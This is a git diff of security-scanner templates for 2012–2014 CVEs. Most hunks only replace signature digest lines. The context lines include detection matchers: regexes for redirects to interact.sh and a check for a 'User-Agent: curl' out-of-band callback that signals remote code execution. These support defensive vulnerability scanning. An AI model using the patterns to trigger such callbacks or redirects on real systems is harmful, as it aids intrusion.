a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 53497d1438..ec3a2f56d0 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204cc5e36a2ee8ecdc47ea1e1332bfd4e0919732d98ac2595852963d7798de4ba50220487777678d27aa1668b6055e70b282b9ef3ddf95ec5457e2ca473d8a545c9b5a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201ca15a560a4b79dddf9b25d765fa94198d5acfde5a4a1fcbc9f2dd50c21a909c022100c25c5e39aa4788dbfbc900e504d971411a4b30a5c57fbb7aabe69828162184c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 778920dd7b..3eadc1da40 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207028135c0fa13bad05116cc8f8c18aa3a2b17a5201446839fb52b9ce0b67f2780220124343d4c8823aebf14144ec2f72b9930c77193f37de463364e1e39191bfb117:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022023990aaa0a337943929270d73a6ca6ccfa0951e71e4d35affffe47368a01ee2d02203c2852f34881275b33bc47af71ff141cb8592e1dc166c19cd15c60b18ec93ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index bb19e0e6ab..2fd23d97bf 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022042fa46d33ddc0a7124938ac92f4a69493074e77808e565fad4e28869cb84fac4022100a930def7de22c227552293d73090f9d2b3845a449612fbb86e727e1b250b8753:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220684f7d73c2bce20bbdf1676a21975e746afc3de3c40661bf8b4d016bb490758b022100b3a3bc59986dc9da7604961ffdad0cc3bedec69b6848fcd44d1f7b1752a6570c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index c5acb2015f..d2dae4b902 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022052cc0f3e66f616329516a8fee8c2b76364817bd724ea1bd916f5a93466cad1540221009404d5d72c4474703f341a1e1e45079957c23aae1fd6d86e4d2783855d516e20:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022077d4558fca2079cc981f49ee2501aaa9a9803e6b4236cb43a196ce83a986c972022100f0969c456e63cd95ecf211a6bae8b3f436bb423e38e360eac72c463e34fb9ad1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 1420452b3d..c1aceb98b9 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220256c1ef8b6784d417044cc39065857941a241f83b6028c4e9106dc96fd04605f022063675ec2a10d274c6395c876c66efe928695848d90eea711167cea680a895868:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210094a6c30380185b870410a6ff1df27c7d96caac3b30fa740671b610d86195b5d0022002f30d7b66357e85319c250030189ccde944c0f3a804b2f338446b400c53ac7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 1f8bc49c44..14ae08c7c3 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022047660779f7c4acd67e1e37c3f537d5f9af1447afb4188465cae199cc81d4712f02203fa251d661c807d03476286793c776b1cf237efbc20212dbc0b9d9b5a27d77ae:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203dd116a8c62231233956a8031d085958ff0c79e51e5ab8d77d2d199597543568022100bce1ac49f3cf76c4b8ae0626be2bccf99be676aabdc8d44ee0d13e5815c21c7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 3f49e1b01d..faf22db611 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -64,5 +64,4 @@ http: name: linux_working_path regex: - "/.*/showenv" - -# digest: 4b0a00483046022100f63c9579607f325e0f5c7c4145d46936176326ee32f0de9b0ebd7cfb87c3fd36022100a10f288c2f1857a2f4c318436190723007f73531fcc86b07db8203a0cab7b540:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f680bf3cd8d638a7b0896b9b50a1409c06975f27925611d1e406df5e3659f991022018e6f389af7564f987cee0df9f1e355eaaa6281b16e3ba8d5b5989d8dada5ef4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index d4eb82c841..5cfeae589c 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -45,5 +45,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 490a0046304402207de931a43dc142def3df94a77cce2911a1d7f8a01de5ae0a4fe215b9bbe421e802200fd0afd85d8b0c234ce87200a30249b384ecf039c8c2135f215a9029af1430fa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a905ddc5035a69419eb9637464e5afe558bc530f4e7da59b53498a6479d182a6022100e654af5e628f673dd10bb1fc5e04eccf08d985335bc57072c15b6d1c9f9e37b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 8f00a89f23..a86f98ddab 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fd6f9698379242b93322cfac0ff47518a8ce0e6a530a730e4a6184ea0eff2dae0220012d1a0bd2a9ea1cc4fe3b1d5d686c2096c2e170664a16fee4bc645534d319ac:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200f78275f8b85e38ae15737ef6741e842981461ca16aa037e10ffcaa0bfa345d4022100ec8dd23b9463ec96e17c2b334f73304f4195c6517c8bdf78774bbd0f32db7a94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 9a9471efac..1c1c736998 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220220047ff39b458f3368a1fdc09b9abff790ad3586a78a58c90355f1c81faf341022100dc446c0100a6399168c6d550f4badb562802114231f35e4a7f52d339047f0a30:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210082a8bcd368b0f5e5dd222eb306bd816b53964a00a16011d48e9fabf354d6a9f7022100d6a90837ad93a392515461b287be5c65826ca272591d0f0f731d66cac13201bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index f7fe9c4e6c..c0bf55c3d9 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100943820529ed2f960c0035a87b2852c34b144b12de2d1f697a709d0d1d0b59ed7022053f89696928abec8630ac89f513ebe7aee4e8b7a48396edfe2120ab3a499af29:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205e3cfb8b9635fa56449d88fe0702b4905077722055cf3571122970a172430d4202206de82c90e78d17fbea8b977cdefb1dd21045277fe3a8f297357b938deec9dbc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 2e7a63c145..70b307dff3 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220643a0e4bb50b46c8abb1f767ea5cac0cad7c5e42c5d5ec237408b9babca0e671022100ced67d97934d853a6ef316322d3b2cc40918d67e65fe036f73dee1471ecd1552:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100fd3b48ba8406a45ee0db3a03fc93331515e4d37ada4a47516d91c8a31fb3e51c022100b322b8568f04e6b38f68f7b8a69fedd67764e4b1cca4ea2ec444fce76549ff63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index a2ace2a4c0..d03773aefb 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402201756ab8affa4fe93a17aca3a0c4ecc92f10af414ca29ac20d1f0c1b74b3c64b402203b872966729db244b6c452683c441ca683ebf2a5b1d8352fb0decae30146ede7:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205a2e6fff1fe3e4a156f49ae1b09fe0d484c9c607a5bcb38527b632304b57b82b0220577322896c64d1be84e063c1d227815f381aaaf5b6ee2255bc1cd376be1dbd7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index f12ada1149..a414c08497 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210080c2a6a114127f7f2ddf784bc3794e1214e146388d13d372d6d7dffde7b3ee1702200f8fd76fd444e02736a11610d70f666bc8fa1d8b336b6a7be2640e8c4945e548:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220016c5f09c85244c642c56ab330f0ae46aeb247fd381b87ceafbf95ecd01940730220287cf609ee4854b4ca44f7b195c547b486c85496caf8d2db4e6c844273d64cb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 993cdf0d2d..2850ddef77 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009af37e803821294328d68bd0ac7ef1c901992e362c40e08a7ecfbbd0a5fcf2e602207c64ef96960a0efb44e7e725c6903c89c8ef811f462fcdc9b8342c172e7b7360:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d7df6f4d1b99e0affd32fb2a2e921b55855792cb4de580db3cbc397975642d69022100b4bbd6a13adc0d9a7674fb92e3f0cfff5d85815d657d290be09c2bbdcbe3b553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index fa39c90a52..516da8730f 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -40,5 +40,4 @@ http: - "fonts" - "extensions" condition: and - -# digest: 4b0a00483046022100f0902b349de4a29d77da9a1adf761387d5b281b66e1b63e7ed49aea6afa6b452022100915c07ed7c5d05c7e6d50fd8b6973c63bedfb36de19445f2453823f481cd4214:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009dc70261dc1adb65dc53a0bceed2c721166b75834adb8d0bc0e3e7f21c3bc40802201787b378d873475c6e932bab8a23799b8211a311452dbb62a9b407f42bf8fc9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 3f90421eda..0e6d6fc036 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -37,5 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a0047304502201f6b05c1ba55b749b9a84842ee284de45a85341c81da2badd7cdf22c98d175d4022100e33256267a3273d78d2ff2c48c9caa19a550758b34f9567113337c672449bbc3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203d2cde83abaa7b672f836deb6296b80ca512a595066233807203e07b5a408500022100922f0880ec0d75365f0dcd45208f7909668b11dd013aa69c498c437eddf93277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index c7512afc41..c69bdbf104 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -38,5 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 4a0a00473045022100f180062e8ccd6a5f7defd592f72786ca2b59f674e15bb8111d2d1cc25da7189502206ebbc52aeffd06a897d84e72becd6c5ed29565d363d47dc7af9025fbd4c95a06:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a2af29b0d3773ce19f358f7c56bbada3657144362409fc68763eabbf98b116f1022071da3d5c777a0ea1591b8ef7b16ed1cfa16547a6fd8946ef32b78d3a6f04c8ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 9d18a5b20a..db081172f1 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f007a9d5195bb840d084d49aa534f4d71109399f23723788546ddf724ac2970c022100c34118b14eefc5fe99ce554b8bb319fa2c0f763e5ed36a62aa6ca5d4d0cbeee6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202f5dc42ce4e24c78a86c23637cf0a6fa51b7ae705315d7ced8996f220d353ddc0220208cae56dda812f02e79d5027c3c08c91699c9a38442fc9ea244d4b81d4562bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 1528b7bccc..c285b600e9 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -39,5 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' - -# digest: 4b0a0048304602210081970a600e49ec1814de503bfcee73652acc8a95050ccd857d78926ddf38ea2d022100de16109b1d6a77bce44b0d61a6a5590dfe03f321e40afccbd40e00c99bc980a3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202545b740f5b12cdb25eb34ca93fb15a74cf233b2f704d5ea821e687e089e020402206da42316a9cf1f983c632f0e2f7825aff23adca32b620860b97971599ec62825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 4f5a31925e..f0e06ffdca 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022014e3ec573080db17f5daec11ea4f7106e586feb440e055c2b468e8a83cae230d022100c39718cd4ea9405c54606e6d65bcd32219f7406bfb51bf2d537a2881caab6e3f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cca5d265d46b27b72bdb28c439af4e73cfac7bc5e164a1fa57329ec286028dd7022100e3a072e5741f2036f8f4643d62a450e5c08eadf5fa9bb88df729c2759637392a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index d58ab1047f..74ab34cea1 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c44d41e3a6e0f0227c67bc0365678a7701bb39b9ea9f1e5f95ab8aec3fd388cd02204914bace0a35bf1a23a08f47524f071eb3732984b1e433bd8e6c793a1ef009a9:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202dd35e27424c8304819cf60b83531399076e2c6e376b27842fe8bf126a88f31502205d62ae293b0d2adef27c88e92a1daa70ce07f067664948b3221c27a5d26724bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index 0c7296ac34..754034d703 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -40,5 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 4a0a004730450221008f74332fa8d8f55b076ea1cfe052a81b04bfc33f8b4d92657870285785f47a6e02201b04d23e948533bc63a150a00e19b2f27750fc407bf777033089a28b9efd06a3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203a4df2ad603574089a0f19e9e566bd6f8cc78c3bb5533411bf5f82581f96aa3202207fd3d9bc5fb9304d92685eb4e62c5bc3878c5a281b69ef261cb336083820f103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index dadea0271c..30e7809652 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c8bf4f36f2caf87138614d5670ac042201b61e7623842fbea1a25293b38b055b022100d9a7065ffbd2072457ef900feed6612e2d6782483423569986f5a533553715b6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200e841cbf059cd3683fc4a061cd48a78c9ba598c03a276e6cae2c95a9a880dd8d0220068be74e8562c5892d291ba86e7823bb89a4d9717a9fb32cb06e4ac59ab042b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 97e1444e54..41ea185960 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -55,5 +55,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f94db5593542ceb1cd0fbb7644c20fb038b179b7349cc0b9dc36019f032a56e002207cc0061fc33f14746f104fb1fb9dc7de4b5deecf7826655f26686f2e0d3b9ff1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b27965f1c6960e6cde07013668e48f94d0414c0f975b2adc6e640e72afe85ee802205ca6065708e60f7f04a4977a56920e74f34470dddf825924aecfe90d82f7584e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index e48d69a706..858e3dd06c 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bd468adbbdd001d205b0b4c2a1f73ec67420a4ade9790120a2a1751ef99ddeff02205daf98e7b40b65acd5c6d12d1b622349094f607a89e97f82f5616de2362e08fd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201f6bf738385af338a6540db30bda54d5c08218c2fed32a494d8bab4d7aff6251022100949ec965966abad4a5adbede315003e6475eb22011f8c3413c823bbd927737a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 3a0742087c..2cfa396870 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203b2b5bfc5a313df6425e452d2c76fb6e99ab3d17d28f485be9d7c75a5fd6d0960220274fe20a3ad567e74a0af69d92410e228e0786a3088186e29390bda107a53300:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200b3064917c78aa540c17ace61ebda94cd91672acc412d37dc00e5d1f91e57e7f02207d8241009793402c3485f2d5a2363060f79725bb4ec2bf3452d458593bb71cbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index fc9ae1d07d..6b2f5cde7b 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e409e0c1cf03eddf7c2f183bc33c57bbea87d5287aa69c0eda743497e5973c280220275380889529d76d32660cea594f227d2ae40d1c1e3b7a0fbc77dc7d0f6f8a8c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a58a36f298f6ebeeb9f2aa52af61ee742cb0782f659afeb3c959ae794a05b258022000f219b9d4e42eed9f45e2c7b19d505651dc3ee49e1d45ad9b2d9b9a1b0e6d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index d1657cb271..640149bbcd 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207800b4a0634644b37838eed902b3db641615b660070710dd8bae1aac4978a2e602206a3b7a4976e1ea375e80272fb28ff4e1b5ecf8c90083d87497f8733879fe8359:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203c9e5285052149efef63fd84bb93431587d4a7f187c8523d8b4c296bf4287d7b022100bf8d64518dcdf31dee7e9ea011d52c1e0e663004c652e9f9673ee119688beda3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 4bc8f4c9d0..0e22991c47 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -53,5 +53,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c82a28c9cd0ab39f2c401b8dda67fa2f6ab0e045854ce710590efb0f9c4f92a5022100dc851b5ad92d8cdf62f8e87317dc68c84316a5167c241970097055a53c6aff8b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206b13eb3e911bbb398381d0e256679f7844679221796fc0c4a4ac2f030948b75b02206739c815fe3b84edb4b15a8b885a4c68a5f4a66d32a221da60757f6f7acc4bee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 591e7b83f2..a877bbc3f5 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c39312307f8357d5efedf5f41993d782687672c89a5bdcfe1754fca83b953c81022062e37e540fb4e935dd779fe95f13f191aec0fa85b76ca7f8c0b65a9535d9f70b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210099f06c3020a8ac11211933efd31fb4a50e1a1d2476d7f8326a8614fc520e6a33022100b33f971c095e3ea221d93207943cb34a946b49a2ccb30225aa83995c097ade34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index 1a3a150e9b..4c3807bbee 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -62,5 +62,4 @@ http: part: interactsh_request words: - "User-Agent: curl" - -# digest: 4a0a0047304502207e2871a07ad9bd3bcc371868e60dcdb503326a0a8a3dc9e426c30bf8bf42dd9a022100bc1300ad73aa33d40df1c28ba3f4710c4ac19080d75e7614965c8ebaed533d1e:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220513e273d913f600acb883b1cfd3675a0075a70e1d3e97849ef0b0f96ff93156102200519dec3d5fde780b1f77ad94d157accb998c1694a1134a15c8daf2c4952d01c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index bfc441dfe1..c57d9f80c6 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220706ea5c4524cf81101e2766e42457e45834cffcd629bf99b9c08890824f8e0c4022100d9139f9b5360e6cd8238ea2fcc4a64e7b39fb011729a545245e2ea4f3f0d66c3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202fcde907b6d5e20daca5df31f5ef142c24bbcda051faa0dc58a179c4b89ca17a02207de0a2ffdf1786c9c8e1c25c6c1e68594bfd674a10d329fa8d02bd2be4012dfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index 8174440d93..9bbb24e46c 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207bbe3b62b0dd22ef4210250670d182a642552542d4bbcd3ac9390c9d9adc07680221009616335485dab5c0f426850a31551455a4edb5d716eb6f93111a48608d17d8d1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ff19d8aca2880fdfafcdb21a274f81572ea31c01735ad63b03ef00b239cb6317022100ec5301e71d16dbe8f05d486084f17531dfad631627b3ca605461f147ca627931:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index cb164f61fc..350b478119 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e2e7ea1e5d80f57c5b6ab9ff95ccc35a08993c0aa929844a1336766bcefe1d5802200eb96f0009e7708b9da43badc9b0a61a5dc6c47746825c0fc72bacdb04e58ef4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009da9b2d622e372ea9515c924a659c4ae34897faf824847a4cd703071aef1c21d022100d8423a77d1f5e21ed250f28e7955a54df3d14ba2d91d9bf4468f303fd7de2f97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 916c40616d..0c8c76d727 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -62,5 +62,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f7eb7351bfa068f0e8043fcf3aa9e16858ae8f578528539cb78053191f48419a022100d3bedf31c727c241382af0b65b4c95b2705722bccdb37824aa4fb4ecd87d2d76:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207ac933da6c0d3eca92065946d4d0849090c204e2155de33f096a4b5ebd7aa6b4022038af7c7e13015552c21c7b5edf1d808a03010e9578378021f8a3700ab2b906bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index a5c6ea733c..7931f84f20 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d218568b06ba2d336e7bc0641185d7ad090b7c249947a5cc975b29f7e77e428b0221008f447de5c9144290173ac4c3efada34d3d8ec73299eff0effdd0d0bc751cca2f:922c64590222798bb761d5b6d8e72950 +# digest: 